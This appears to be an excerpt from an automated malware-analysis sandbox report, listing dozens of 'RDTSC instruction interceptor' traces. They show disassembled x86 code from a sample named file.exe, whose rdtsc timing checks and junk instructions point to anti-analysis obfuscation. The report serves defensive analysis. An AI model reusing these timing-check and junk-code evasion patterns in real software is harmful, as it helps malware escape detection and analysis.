Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03F2 second address: 52B0401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0401 second address: 52B043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F988C7CE326h 0x0000000f mov eax, dword ptr [769B4538h] 0x00000014 pushad 0x00000015 mov cx, 702Dh 0x00000019 mov si, E229h 0x0000001d popad 0x0000001e xor dword ptr [ebp-08h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B043F second address: 52B0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0443 second address: 52B0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0454 second address: 52B045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B045A second address: 52B045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B045E second address: 52B0488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F988D0B028Bh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0488 second address: 52B055C instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F988C7CE322h 0x0000000d add esi, 6DF4A8B8h 0x00000013 jmp 00007F988C7CE31Bh 0x00000018 popfd 0x00000019 popad 0x0000001a nop 0x0000001b pushad 0x0000001c mov ebx, eax 0x0000001e call 00007F988C7CE320h 0x00000023 mov esi, 03EC3171h 0x00000028 pop ecx 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F988C7CE31Ch 0x00000030 nop 0x00000031 jmp 00007F988C7CE320h 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 pushad 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop ebx 0x0000003e pushfd 0x0000003f jmp 00007F988C7CE328h 0x00000044 and cx, 67D8h 0x00000049 jmp 00007F988C7CE31Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov dword ptr fs:[00000000h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F988C7CE31Bh 0x0000005f adc eax, 01751A9Eh 0x00000065 jmp 00007F988C7CE329h 0x0000006a popfd 0x0000006b mov esi, 76887E67h 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B055C second address: 52B05A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0293h 0x00000009 sub esi, 14E0A4AEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 mov ecx, 587FC537h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [ebp-18h], esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B05A4 second address: 52B05B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B05B3 second address: 52B0622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F988D0B028Ch 0x00000016 xor si, BBB8h 0x0000001b jmp 00007F988D0B028Bh 0x00000020 popfd 0x00000021 mov ah, 17h 0x00000023 popad 0x00000024 mov ecx, dword ptr [eax+00000FDCh] 0x0000002a jmp 00007F988D0B028Bh 0x0000002f test ecx, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F988D0B0295h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0622 second address: 52B06C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE327h 0x00000009 jmp 00007F988C7CE323h 0x0000000e popfd 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jns 00007F988C7CE350h 0x0000001b pushad 0x0000001c movsx edi, cx 0x0000001f pushfd 0x00000020 jmp 00007F988C7CE31Ah 0x00000025 sub ecx, 2F86CA08h 0x0000002b jmp 00007F988C7CE31Bh 0x00000030 popfd 0x00000031 popad 0x00000032 add eax, ecx 0x00000034 jmp 00007F988C7CE326h 0x00000039 mov ecx, dword ptr [ebp+08h] 0x0000003c jmp 00007F988C7CE320h 0x00000041 test ecx, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F988C7CE327h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B06C5 second address: 52B06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0294h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B06DD second address: 52B06E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A01E4 second address: 52A0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 1C52h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F988D0B0296h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F988D0B0297h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0223 second address: 52A0254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 741DBEBAh 0x00000008 call 00007F988C7CE31Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 jmp 00007F988C7CE31Fh 0x00000018 sub esp, 2Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0254 second address: 52A0258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0258 second address: 52A025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A025E second address: 52A0284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F988D0B0290h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0284 second address: 52A0288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0288 second address: 52A028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A028E second address: 52A0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0294 second address: 52A02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push esi 0x0000000b mov dl, CBh 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F988D0B028Ah 0x00000015 mov dword ptr [esp], edi 0x00000018 pushad 0x00000019 mov dh, al 0x0000001b call 00007F988D0B0293h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02F1 second address: 52A02F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02F5 second address: 52A02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02FB second address: 52A0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE321h 0x00000009 xor ah, FFFFFFC6h 0x0000000c jmp 00007F988C7CE321h 0x00000011 popfd 0x00000012 mov ax, 1577h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F988C7CE329h 0x00000022 add ch, FFFFFFD6h 0x00000025 jmp 00007F988C7CE321h 0x0000002a popfd 0x0000002b mov ah, 08h 0x0000002d popad 0x0000002e inc ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 call 00007F988C7CE31Fh 0x00000037 pop esi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A042D second address: 52A0498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F988D0B0290h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, D8h 0x00000013 call 00007F988D0B028Ah 0x00000018 pushfd 0x00000019 jmp 00007F988D0B0292h 0x0000001e sub ecx, 6B9C5B98h 0x00000024 jmp 00007F988D0B028Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F988D0B0292h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0498 second address: 52A04AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A04F7 second address: 52A05B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F988D0B0298h 0x00000008 or ax, 2518h 0x0000000d jmp 00007F988D0B028Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 jmp 00007F988D0B028Fh 0x0000001b pop eax 0x0000001c popad 0x0000001d js 00007F988D0B02D5h 0x00000023 jmp 00007F988D0B028Fh 0x00000028 cmp dword ptr [ebp-14h], edi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F988D0B0294h 0x00000032 xor ecx, 3F89A9D8h 0x00000038 jmp 00007F988D0B028Bh 0x0000003d popfd 0x0000003e movzx esi, dx 0x00000041 popad 0x00000042 jne 00007F98FE76E1A6h 0x00000048 jmp 00007F988D0B028Bh 0x0000004d mov ebx, dword ptr [ebp+08h] 0x00000050 jmp 00007F988D0B0296h 0x00000055 lea eax, dword ptr [ebp-2Ch] 0x00000058 pushad 0x00000059 mov esi, 46431EBDh 0x0000005e mov dx, ax 0x00000061 popad 0x00000062 xchg eax, esi 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 mov ah, 79h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A05B8 second address: 52A05D5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F988C7CE31Dh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov di, 5E74h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A05D5 second address: 52A0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F988D0B0295h 0x0000000a xor ch, FFFFFFE6h 0x0000000d jmp 00007F988D0B0291h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0605 second address: 52A060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A060B second address: 52A060F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A060F second address: 52A061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A061E second address: 52A0624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0704 second address: 5290E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F98FDE8C258h 0x0000000f xor eax, eax 0x00000011 jmp 00007F988C7A7A4Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F988C7CE317h 0x0000002b jmp 00007F988C7CE48Bh 0x00000030 call 00007F98913183B5h 0x00000035 mov edi, edi 0x00000037 jmp 00007F988C7CE327h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F988C7CE325h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E31 second address: 5290E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E37 second address: 5290E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E3B second address: 5290E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F988D0B0296h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov cl, 07h 0x00000012 jmp 00007F988D0B0293h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F988D0B028Bh 0x00000023 jmp 00007F988D0B0293h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E9A second address: 5290ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE31Bh 0x00000009 adc ch, 0000006Eh 0x0000000c jmp 00007F988C7CE329h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 672AE7DAh 0x00000020 mov bh, A7h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290ED7 second address: 5290EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290EF0 second address: 5290EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290EF5 second address: 5290F15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290F15 second address: 5290F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A90 second address: 52A0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A96 second address: 52A0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A9A second address: 52A0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 movsx ebx, cx 0x00000013 call 00007F988D0B0296h 0x00000018 movzx eax, dx 0x0000001b pop ebx 0x0000001c popad 0x0000001d je 00007F98FE75E1BDh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AD4 second address: 52A0AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AD8 second address: 52A0ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0ADC second address: 52A0AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AE2 second address: 52A0AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AE8 second address: 52A0AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0B44 second address: 52A0B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 58123C59h 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e mov ax, bx 0x00000011 popad 0x00000012 add dword ptr [esp], 1E885FCFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F988D0B0294h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0B73 second address: 52A0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F98FDE83306h 0x0000000e push 76952B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [769B4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 pushad 0x00000054 jmp 00007F988C7CE31Bh 0x00000059 popad 0x0000005a sub esi, esi 0x0000005c jmp 00007F988C7CE31Fh 0x00000061 mov dword ptr [ebp-1Ch], esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BAD second address: 52A0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BD7 second address: 52A0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BDD second address: 52A0BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BFE second address: 52A0C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C02 second address: 52A0C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C06 second address: 52A0C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C0C second address: 52A0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0299h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C29 second address: 52A0C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F98FDE7206Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 517075A5h 0x00000016 mov esi, 3117C721h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C45 second address: 52A0C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B028Dh 0x00000009 or cx, CDF6h 0x0000000e jmp 00007F988D0B0291h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0933 second address: 52C094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov cl, 81h 0x00000007 popad 0x00000008 push ebp 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d mov bh, CBh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C094C second address: 52C0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0950 second address: 52C0954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0954 second address: 52C095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C095A second address: 52C095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C095F second address: 52C09A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, 1318h 0x00000011 mov edi, 072B48C4h 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a mov eax, 2138DB65h 0x0000001f mov bl, ah 0x00000021 popad 0x00000022 mov dword ptr [esp], esi 0x00000025 jmp 00007F988D0B028Dh 0x0000002a mov esi, dword ptr [ebp+0Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F988D0B028Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09A3 second address: 52C09C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F988C7CE31Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09C9 second address: 52C09D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09D9 second address: 52C09F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F98FDE5BCE3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, di 0x00000017 push edi 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
